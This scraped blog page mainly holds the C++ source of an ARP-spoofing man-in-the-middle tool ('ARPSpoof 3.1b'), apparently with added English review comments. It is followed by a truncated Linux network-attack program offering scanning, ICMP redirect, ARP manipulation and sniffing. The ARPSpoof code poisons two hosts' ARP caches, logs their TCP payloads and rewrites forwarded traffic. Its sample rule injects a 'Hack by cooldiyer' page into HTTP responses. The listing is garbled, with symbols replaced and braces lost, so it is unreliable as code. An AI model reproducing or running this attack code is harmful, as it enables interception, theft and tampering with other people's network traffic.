在线等ip1=(structitem*)malloc函数(c[k]=b[j ];

arpspoof.cpp
#include&&stdio.h&
#include&&pcap.h&
#include&&winsock2.h&
#pragma&comment(lib,&&ws2_32.lib&)
#pragma&comment(lib,&&wpcap.lib&)
#include&&iphlpapi.h&
#include&&protoinfo.h&
#include&&spoof.h&
#include&&tcp.h&
#include&&scan.h&
#include&&replace.h&
// Linked-list node that stores the strings to be replaced: one old/new pair per node.
// NOTE(review): the extracted listing has lost braces and the ends of several
// declarations (the `next` member, some global names); the code lines are kept as found.
typedef&struct&tagSTRLINK
char&szOld[256];
char&szNew[256];
struct&tagSTRLINK&*
}STRLINK,&*PSTRLINK;
HANDLE&hThread[2];&// the two threads that send the RARP packets (author's wording)
unsigned&short&g_uP&// port number to monitor
pcap_t&*&// network adapter handle
HANDLE&g_hE&// used to catch Ctrl+C
int&g_uM&// spoof flag: 0 means one-way spoofing, 1 means two-way spoofing
BOOL&bIsReplace&=&FALSE;&// whether forwarded data is rewritten
BOOL&bIsLog&=&FALSE;&// whether captured data is saved
char&szLogfile[MAX_PATH];&// name of the file the data is saved to
// These correspond to members of the ARPSPOOF structure
unsigned&char&ucSelf[6],&ucIPA[6],&ucIPB[6];
// 16 bytes holds a dotted IPv4 string (15 characters) plus the terminator and nothing longer.
char&szIPSelf[16],&szIPA[16],&szIPB[16],&szIPGate[16];
// Initialise the linked list
// NOTE(review): no NULL check on this allocation is visible in the listing.
PSTRLINK&strLink&=&(PSTRLINK)&malloc(sizeof(STRLINK));
char&TcpFlag[6]={&'F','S','R','P','A','U'&};&// TCP flag letters, used when analysing packets
BOOL&InitSpoof(char&**);
void&ResetSpoof();
void&Help();
// Formatted copy function; per the original comment it exists mainly to replace
// the 'r' and 'n' escape characters while copying szSrc into szDst.
// NOTE(review): the backslashes inside the character literals and several lines of
// the body (braces, the final else branch) appear to have been lost in extraction,
// so the control flow below cannot be read literally.
// NOTE(review): no destination size is passed in, so nothing visible here bounds the
// writes to szDst; the callers in this listing pass 256-byte buffers filled by fgets().
BOOL&fstrcpy(char&*szSrc,&char&*szDst)
unsigned&int&i,&j;
for&(i&=&0,&j=0;&i&&&strlen(szSrc);&i++,&j++)
if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'r')&//&Replace&&r&
szDst[j]&=&'r';
else&if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'n')&//&Replace&&n&
szDst[j]&=&'n';
else&if&(szSrc[i]&!=&'n'&&&&szSrc[i]&!=&'')
szDst[j]&=&szSrc[i];
return&TRUE;
szDst[j&+&1]&=&'';&//&add&''
return&TRUE;
// Load the rules from a file into the linked list.
// In:  szJobfile - name of the rule file
// Out: strLink   - pointer to the head of the list
// Returns FALSE when the file cannot be opened or a rule is malformed, TRUE otherwise.
// NOTE(review): the FALSE returns visible below all come before fclose(fp), so the
// file handle appears to leak on every error path - confirm against the full source.
BOOL&ReadJob(char&*szJobfile,&PSTRLINK&strLink)
char&szBuff[256],&*p&=&NULL;
if&((fp&=&fopen(szJobfile,&&rt&))&==&NULL)
printf(&Job&file&open&errorn&);
return&FALSE;
PSTRLINK&pTmp&=&strL&// save the original pointer
while&(fgets(szBuff,&sizeof(szBuff),&fp))
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szOld,&0,&sizeof(strLink-&szOld));
// NOTE(review): the return value of this and the following fgets() calls is not
// checked, so a truncated rule file is parsed from a zeroed or stale buffer.
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szOld))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
fgets(szBuff,&sizeof(szBuff),&fp);
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szNew,&0,&sizeof(strLink-&szNew));
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szNew))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
printf(&Replace&Job&file&format&error,&
used&arpspoof&/n&release&a&new&job&filen&);
return&FALSE;
// Append an empty node for the next rule; the last node always stays unused,
// which is why the list walkers in this file loop on `->next`.
// NOTE(review): the malloc() result is dereferenced without a NULL check.
strLink-&next&=&(PSTRLINK)&malloc(sizeof(STRLINK));
strLink&=&strLink-&
strLink-&next&=&NULL;
fclose(fp);
strLink&=&pT&// restore the original pointer
return&TRUE;
// Write data to a file.
// In: szLogfile - log file name; data - void pointer to the data block;
//     size - size of the data block in bytes.
// Returns a Boolean: FALSE only when the file cannot be opened.
// The file is opened with OPEN_ALWAYS and the pointer is moved to FILE_END,
// so each call appends to whatever is already there.
// NOTE(review): the WriteFile() result and dwBytes are ignored, so a failed or
// short write is still reported as TRUE.
BOOL&SaveLog(char&szLogfile[],&const&void&*data,&unsigned&int&size)
hFile&=&CreateFile(szLogfile,&GENERIC_WRITE,&FILE_SHARE_WRITE,&NULL,&
OPEN_ALWAYS,&FILE_ATTRIBUTE_NORMAL,&NULL);
if&(hFile&==&INVALID_HANDLE_VALUE)
return&FALSE;
SetFilePointer(hFile,&NULL,&NULL,&FILE_END);
WriteFile(hFile,&data,&size,&&dwBytes,&NULL);
CloseHandle(hFile);
return&TRUE;
// Console control-event handler; mainly deals with the program being interrupted.
// Every listed event (Ctrl+C, close, break, logoff, shutdown) runs ResetSpoof()
// and returns TRUE; any other event type returns FALSE.
BOOL&CtrlHandler(&DWORD&fdwCtrlType&)&
switch&(fdwCtrlType)&
//&Handle&the&CTRL-C&signal.&
&&&&case&CTRL_C_EVENT:&
&&&&case&CTRL_CLOSE_EVENT:&
&&&&case&CTRL_BREAK_EVENT:&&
&&&&case&CTRL_LOGOFF_EVENT:&
&&&&case&CTRL_SHUTDOWN_EVENT:
ResetSpoof();&// restore the ARP cache of the spoofed hosts
return&TRUE;
&&&&default:&
return&FALSE;
// Assign the shared (global) variables and initialise the parameters.
// Reads argv[1] and argv[2] as the two IP addresses, argv[3] as the port and
// argv[5] as the mode. Returns FALSE if GetMac() fails for either address.
BOOL&InitSpoof(char&**argv)
// IPSelf and ucSelf were already initialised when the adapter was opened
memset(ucIPA,&0xff,&6);
memset(ucIPB,&0xff,&6);
memset(szIPA,&0&,16);
memset(szIPB,&0&,16);
// GetMac() is defined elsewhere; presumably it resolves the MAC for the given
// address into the 6-byte buffer - confirm against spoof.h / scan.h.
if&(!GetMac((char&*)&argv[1],&ucIPA))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[1]);
return&FALSE;
if&(!GetMac((char&*)&argv[2],&ucIPB))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[2]);
return&FALSE;
// NOTE(review): szIPA and szIPB are 16-byte globals and these strcpy() calls take
// command-line text with no length check, so an argument longer than 15 characters
// writes past the buffer. Whether GetMac() rejects such input is not visible here.
strcpy((char&*)&szIPA,&(char&*)&argv[1]);
strcpy((char&*)&szIPB,&(char&*)&argv[2]);
StaticARP((unsigned&char&*)&szIPA,&ucIPA);
StaticARP((unsigned&char&*)&szIPB,&ucIPB);
// NOTE(review): atoi() cannot report a parse error; non-numeric text becomes 0.
g_uPort&=&atoi(argv[3]);
g_uMode&=&atoi(argv[5]);
return&TRUE;
// Print the ARP spoofing information (for debugging): target, IP and the six
// bytes of ucPretendMAC.
// The delay is there to wait for the parameters to be handed over, because the
// functions share a single ARPSPOOF variable.
// NOTE(review): a fixed Sleep(100) is a timing assumption, not synchronisation.
void&SpoofInfo(PARPSPOOF&arpspoof)
printf(&Spoof&%s&%s&MAC&%.2X-%.2X-%.2X-%.2X-%.2X-%.2Xn&,
arpspoof-&szTarget,&arpspoof-&szIP,&
arpspoof-&ucPretendMAC[0],&arpspoof-&ucPretendMAC[1],
arpspoof-&ucPretendMAC[2],&arpspoof-&ucPretendMAC[3],
arpspoof-&ucPretendMAC[4],&arpspoof-&ucPretendMAC[5]
Sleep(100);
// ARP spoofing routine: fills an ARPSPOOF structure and starts SpoofThread for
// the IP1 -> IP2 direction, and a second thread for IP2 -> IP1 when g_uMode is 1.
// In both directions ucPretendMAC is set to this host's own MAC (ucSelf).
// Defensive context: poisoning of this kind is visible on the wire as one MAC
// address being advertised for two different IP addresses; dynamic ARP inspection
// on the switch or static ARP entries on the endpoints are the usual countermeasures.
// NOTE(review): one heap-allocated ARPSPOOF is handed to the first thread and then
// overwritten for the second; only the Sleep(100) inside SpoofInfo() separates the
// two, which is a data race. The malloc() result is not checked and no free() of
// the structure is visible in this listing.
void&ARPSpoof()
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
//&Spoof&IP1&-&&IP2
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
if&(g_uMode&==&1)&// two-way spoofing
//&Spoof&IP2&-&&IP1
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
// Reset the ARP spoof and restore the ARP caches of the deceived hosts.
// This is the reverse of ARPSpoof: the same threads are started, but
// ucPretendMAC is set to each peer's real MAC (ucIPB / ucIPA) instead of ucSelf.
// NOTE(review): TerminateThread() is called on hThread[1] unconditionally, although
// that handle is only assigned when g_uMode is 1; TerminateThread() also stops a
// thread without letting it release anything it holds.
// NOTE(review): as in ARPSpoof, one ARPSPOOF allocation is shared by both threads
// and rewritten after a fixed Sleep(200); it is neither NULL-checked nor freed here.
void&ResetSpoof()
printf(&[+]&Reseting&.....n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPB,&6);
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
if(g_uMode&==&1)
Sleep(200);
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPA,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
// NOTE(review): the message says 5s, but the loop below is 12 iterations of
// Sleep(300) (presumably `i < 12`; the operator was lost in extraction), i.e. 3.6 s.
printf(&[-]&Sleep&5s&&);
for(int&i&=&0;&i&&&12;&i++,&Sleep(300))
printf(&.&);
printf(&n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
// After pcap_breakloop, any further operation on the adapter aborts the program - keep this in mind
pcap_breakloop(adhandle);&
// Replace content inside the packet and recompute the checksums.
// pkt_data is the captured frame (Ethernet header first), pkt_len its length.
// NOTE(review): nothing visible in this listing compares pkt_len with the header
// sizes before the headers are dereferenced, and ipLength is taken from the packet
// as-is; a short or malformed frame is therefore read (and possibly written) out of bounds.
void&ReplacePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
// Get the pointer to, and the length of, the TCP payload
// NOTE(review): both are computed from the fixed struct sizes rather than from the
// ip_len just derived or the TCP data offset, so IP or TCP options shift the real
// payload; lentcp is a signed int and goes negative when ipLength is smaller than
// the two header sizes.
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
// Start replacing the data and recomputing the checksums
PSTRLINK&pTmp&=&strL
int&i&=&0;
while&(pTmp-&next)
// Match each rule and apply the replacement
if&(Replace(datatcp,&lentcp,&pTmp-&szOld,&pTmp-&szNew))
printf(&&&&&Applying&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
if&(i&&0)&// if the packet was modified, recompute the checksums
printf(&[*]&Done&%d&replacements,&forwarding&packet&of&size&%dn&,
i,&pkt_len);
ih-&ipChecksum&=&0;
th-&checksum&=&0;
ih-&ipChecksum&=&checksum((USHORT&*)ih,&sizeof(_IPHeader));
ComputeTcpPseudoHeaderChecksum(ih,&th,&(char&*)datatcp,&lentcp);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
// Analyse and display the packet contents, or save them to a file.
// Prints one summary line (addresses, payload size, TTL, ports, TCP flags) and,
// when bIsLog is set, appends the summary and the raw payload to szLogfile.
// NOTE(review): as in ReplacePacket, no check of pkt_len against the header sizes
// is visible, and datatcp / lentcp are derived from fixed struct sizes and the
// packet's own ipLength field.
void&AnalyzePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
// Analyse the packet
// NOTE(review): szTmpStr is 85 bytes and is filled by an unbounded wsprintf() whose
// padded fields already come close to that size; a wide lentcp or port value leaves
// no headroom.
char&szTmpStr[85],&szTmpFlag[7];
szTmpFlag[6]&=&'';
// Walk the six low flag bits, emitting the letter from TcpFlag for a set bit and '-' otherwise.
unsigned&char&FlagMask&=&1;
for(int&i=0;&i&6;&i++&)
if&((th-&flags)&&&FlagMask)
szTmpFlag[i]&=&TcpFlag[i];&
szTmpFlag[i]&=&'-';
FlagMask&=&FlagMask&&&&1;&
wsprintf(szTmpStr,
&nTCP&%15s-&%-15s&Bytes=%-4d&TTL=%-3d&Port:%d-&%d&%sn&,
szSource,&szDest,&lentcp,&ih-&ipTTL,&sport,&dport,&szTmpFlag);
printf(&%s&,&szTmpStr);
if&(bIsLog)&// write to the file
SaveLog(szLogfile,&szTmpStr,&strlen(szTmpStr));
// NOTE(review): lentcp is a signed int passed as SaveLog's unsigned size; a negative
// value becomes a very large byte count.
SaveLog(szLogfile,&datatcp,&lentcp);
// Display the packet contents
for&(i&=&0;&i&&&&i++)
if&((*(datatcp+i)&&&0x000000ff)&!=&0x07)&&// filter out the annoying beep (0x07) character
printf(&%c&,&*(datatcp+i));
// Routine that forwards, modifies and saves packets; the core of the program.
// Frames whose destination MAC is this host's but whose destination IP is not
// are re-addressed to the other peer's MAC and sent back out through adhandle.
// NOTE(review): pkt_data is declared const but the Ethernet header is rewritten in
// place through the cast pointer eh. No comparison of pkt_len with the header sizes
// is visible before the headers are read, and the TCP ports are read before the
// protocol field is checked.
void&ForwardPacket(pcap_t&*adhandle,&const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
if(eh-&type&!=&htons(ETHERTYPE_IP))
&// only IP packets are forwarded
ih&=&(IPHeader&*)&(pkt_data&+&14);&// locate the IP header; 14 is the Ethernet header length
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;&
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);&// locate the TCP header
// Convert the port numbers from network to host byte order
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
// Get the source and destination IP addresses
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
// Start filtering the packets that are to be forwarded
if&(strcmp(szDest,&szIPSelf)&!=&0&&&&memcmp(ucSelf,&eh-&dhost,6)&==&0)
//&rebuild&IPA&-&&IPB
if&(memcmp(eh-&shost,&ucIPA,&6)&==&0)
// Modify the Ethernet header
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPB,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&dport&==&g_uPort)
if&(bIsReplace)&// replace or not
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if&(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
//&rebuild&IPB&-&&IPA
else&if&(memcmp(eh-&shost,&ucIPB,&6)&==&0)
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPA,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&sport&==&g_uPort)
if&(bIsReplace)
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
// Callback for pcap_loop.
// Hands each received packet to ForwardPacket for processing; param is unused.
// NOTE(review): header->len is the length of the packet on the wire, while the
// number of bytes actually present in pkt_data is header->caplen; if the capture
// was truncated, the length passed on here exceeds the buffer.
void&packet_handler(u_char&*param,&const&struct&pcap_pkthdr&*header,&const&u_char&*pkt_data)
ForwardPacket(adhandle,&pkt_data,header-&len);
// Write out a sample rule file.
// NOTE(review): the szName parameter is not used in the visible body; the file
// name is hard-coded in the fopen() call, and the file is opened in "w" mode, so
// an existing file of that name in the working directory is overwritten.
// NOTE(review): the return statements were lost in extraction; the caller in
// main() treats a non-zero result as success.
int&ReleaseJob(const&char&*szName)
if&((fp&=&fopen(&job.txt&,&w&))&==&NULL)
fputs(&----nHTTP/1.n----nHTTP/1.1&200&OK\r\n&&
&Server:&CoolDiyer's&Hack&IIS\r\nContent-Length:&27\r\n&&
&Connection:&close\r\nContent-Type:&text/html\r\n\r\n&&
&Hack&by&cooldiyer&noframes&n----&,&fp);
fclose(fp);
// Main function; mostly handles initialisation from the command-line parameters.
// NOTE(review): braces, else branches and some conditions were lost in extraction,
// so the nesting below cannot be read literally.
// NOTE(review): argv[1][1] and argv[6][1] are indexed without checking that the
// argument is at least two characters long.
int&main(int&argc,&char&*argv[])
printf(&ARPSpoof&Ver&3.1b&by&CoolDiyern&);
if&(argc&&1)
if&(argv[1][1]&==&'l')&// list the available network adapters
ListAdapters();
if&(argv[1][1]&==&'n')&// write out a sample rule file, job.txt
if&(ReleaseJob(&job.txt&))
printf(&[+]&Replace&Job&file&job.txt&release&success...n&);
printf(&[!]&Release&job&file&errorn&);
return&-1;
if&(argc&==&4&&&&argv[1][1]&==&'s')
EnumLanHost(argv[2],&argv[3]);
if&(argc&&&6)&// wrong arguments: show the usage help
// Open the adapter and initialise szIPSelf, ucSelf and szIPGate
if&((adhandle&=&OpenAdapter(atoi(argv[4]),&szIPSelf,&ucSelf,&szIPGate))&==&NULL)
printf(&[!]&Open&adatper&error!n&);
// NOTE(review): FALSE is 0, so this failure exits with a success status.
return&FALSE;
// Initialise the remaining variables and enter the core routine
if&(InitSpoof(argv))
if&(argc&==&7&&&&strcmpi(argv[6],&&/reset&)&==&0)&// start the restore threads; the program exits after 5 seconds
if&(g_uMode&==&1)
printf(&[*]&Reset&&%s&&-&&%sn&,&szIPA&,szIPB);
printf(&[*]&Reset&&%s&--&&%sn&,&szIPA&,szIPB);
ResetSpoof();
else&if&(argc&&5&)
SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler,&TRUE);
if&(argc&==&8&&&&argv[6][1]&==&'r')&// forwarded content is to be replaced
if&(ReadJob(argv[7],&strLink))&// load the rule file and display the replacement rules
PSTRLINK&pTmp&=&strL
while&(pTmp-&next)
printf(&[*]&Parsing&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
bIsReplace&=&TRUE;
printf(&[+]&Loaded&%d&rules...n&,&i);
return&-1;
if&(argc&==&8&&&&argv[6][1]&==&'s')&// whether to save the data to a file
// NOTE(review): unbounded strcpy() of a command-line argument into the
// MAX_PATH-sized szLogfile buffer.
strcpy(szLogfile,&argv[7]);
bIsLog&=&TRUE;
printf(&[+]&Save&log&to&%sn&,&szLogfile);
if&(g_uMode&==&1)&// two-way spoofing
printf(&[*]&Spoofing&&%s&&-&&%sn&,&szIPA&,szIPB);
else&// one-way spoofing
printf(&[*]&Spoofing&&%s&--&&%sn&,&szIPA&,szIPB);
if&(!bIsReplace)&// forward only, no replacement
printf(&[+]&Using&fixed&forwarding&thread.n&);
// Start the main routine: spoof, then forward and process packets
ARPSpoof();
pcap_loop(adhandle,&0,&packet_handler,&NULL);
pcap_close(adhandle);
// Help function: describes the parameters and how the program is used.
// NOTE(review): the second and third examples print a ":80" description although
// the second command line uses port 21, so the help text is inconsistent with
// its own examples.
void&Help()
printf(&Usage:n&);
printf(&&&ArpSpoof&&IP1&&&IP2&&&PORT&&&AdpNum&&&Mode&&/[r|s]&&File&n&);
printf(&&&ArpSpoof&/s&&IP&&&Mask&n&);
printf(&&&ArpSpoof&/ln&);
printf(&tMode&Options:ntt0tIP1&--&&IP2n&);
printf(&tt1tIP1&&-&&IP2n&);
printf(&Examples:n&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&1&/r&job.txtn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&with&rulenn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&21&2&1&/s&sniff.logn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&save&to&lognn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&0&/RESETn&);
printf(&t&&#&Reset&192.168.0.1&--&&192.168.0.8:80nn&);
printf(&t&&ArpSpoof&/s&192.168.0.1&255.255.255.0n&);
printf(&t&&#&Scan&lan&hostnn&);
printf(&t&&ArpSpoof&/ln&);
printf(&t&&#&Lists&adaptersnn&);
printf(&t&&ArpSpoof&/nn&);
printf(&t&&#&Release&a&new&replace&rule&filen&);
分类: Linux
最后的纪念---linuxGL(转)
/*作品名:linuxGL作者:陈兴华来自:广州学校:THXY College班别:网络042班*/#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#define __FAVOR_BSD#include#ifdef __linux#include#include#else#include#include#include#include#endif#define BUFSIZE 4096#define PACKET_LEN 72#define MAXSIZE 4096#define OPTNUM 8#define ON 1#define OFF 0enum{ETHER,ARP,IP,TCP,UDP,ICMP,DUMP,ALL};enum{OPEN,CLOSE};enum{CMD_NAME,CMD_SELECT,START_IP,LAST_IP};enum{CMD_NAME1,CMD_SELECT2,DST_IP,START_PORT,LAST_PORT};enum {CMD_NAME2,S3,TARGET_IP,OLD_ROUTER,NEW_ROUTER,DST_IP1 };enum{CMD_NAME3,S4,DST_IP3};enum{CMD_NAME5,IFNAME,DST_IP4,MAC_ADDR,OPTION};enum{NORMAL,REPLY,REQUEST};#ifndef _linux_/*实现使用BPF作为访问数据链路层的手段用于FreeBSD系统中*/int open_bpf(char *ifname); #endifvoid make_icmp8_packet(struct icmp *icmp,int len,int n); /*ICMP头部*/void make_udp_header( struct udphdr *udp); /*UDP头部*/ void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen);void make_ip_header2(struct ip *ip,int srcip, int dstip,int iplen); /*IP头部*/void make_icmp5_header(struct icmp *icmp,u_int gw_ip); void make_ethernet(struct ether_header *eth,u_char *ether_dhost, /* 以太帧头部*/u_char *ether_shost,u_short ether_type);void make_arp(struct ether_arp *arp,int op,u_char *arp_sha, /* ARP头部*/u_char *arp_spa,u_char *arp_tha, u_char *arp_tpa);u_short checksum(u_short *data,int len);void tvsub(struct timeval *out,struct timeval *in); /*计算往返时间*/void scan_host(int argc,char *argv[]); /*主机查找*/void scan_port(int argc,char *argv[]); /*端口查找*/void scan_uport(int argc,char *argv[]); /*UDP端口查找*/void print_ethernet(struct ether_header *eth); /*打印以太数据*/void print_arp(struct ether_arp *arp); /*打印ARP*/void print_ip(struct ip *ip); /*打印IP数据*/void print_icmp(struct icmp *icmp); /*打印ICMP数据*/void print_tcp(struct tcphdr *tcp); /*打印TCP数据*/void print_udp(struct udphdr *udp); /*打印UDP数据*/void dump_packet(unsigned char *buff,int len); /*打印格式*/void kill_serve(int argc, 
char *argv[]); /*关闭或开启服务*/void on(int argc,char *argv[],char *server_save,FILE *tmp_s); /*开启服务*/void off(int argc,char *argv[],char *server_save,FILE *tmp_s); /*关闭服务*/char* yi_wei(char *server_save,int flag); /*关闭或开启服务中字符的移位*/void redirect(int argc,char *argv[]); /*ICMP重定向*/void scan_route(int argc,char *argv[]);/*查找路由*/void m_arp(int argc,char *argv[]); /*ARP操作*/char *mac_ntoa(u_char *d);/*将数组中存储的MAC地址变换为字符串*/char *tcp_ftoa(int flag); /*将TCP报头的协议标志变换为字符串*/char *ip_ttoa(int flag);/*将IP报头的TOS变为字符串*/char *ip_ftoa(int flag);/*将IP报头的段位变换为字符串*/struct packet_udp{};int main(int argc,char **argv){struct ether_header *struct ether_arp *struct ip *struct icmp *struct tcphdr *struct udphdr *char buff[MAXSIZE];char *p;char *char ifname[256]="x10";int opt[OPTNUM];#ifndef _linux_int bpf_struct bpf_hdr *#endifopt[ETHER]=OFF;opt[ARP]=ON;opt[IP]=ON;opt[TCP]=ON;opt[UDP]=ON;opt[ICMP]=ON;opt[DUMP]=OFF;opt[ALL]=OFF;while( (c=getopt(argc,argv,"mtruoskaei:p:dh"))!=EOF ){switch(c){case 'k':kill_serve(argc,argv);case 'm':m_arp(argc,argv);case 't':scan_route(argc,argv);case 'r':redirect(argc,argv);case 'u':scan_uport(argc,argv);case 'o':scan_port(argc,argv);case 's':scan_host(argc,argv);case 'a':opt[ALL]=ON;case 'i':strcpy(ifname,optarg);case 'e':opt[ETHER]=ON;case 'd':opt[DUMP]=ON;case 'p':opt[ARP]=OFF;opt[IP]=OFF;opt[TCP]=OFF;opt[UDP]=OFF;opt[ICMP]=OFF;optind--;while(argv[optind]!=NULL && argv[optind][0]!='-'){if(strcmp(argv[optind],"arp")==0)opt[ARP]=ON;else if(strcmp(argv[optind],"ip")==0)opt[IP]=ON;else if(strcmp(argv[optind],"tcp")==0)opt[TCP]=ON;else if(strcmp(argv[optind],"udp")==0)opt[UDP]=ON;else if(strcmp(argv[optind],"icmp")==0)opt[ICMP]=ON;else if(strcmp(argv[optind],"other")==0);else{exit(0);}optind++;} default:fprintf(stderr,"no argument my Master linuxcici");exit(0); }}if(optind<argc){while(optind<argc)printf("%s",argv[optind++]);printf("
");fprintf(stderr,"no argument or wrong my Master linuxcici
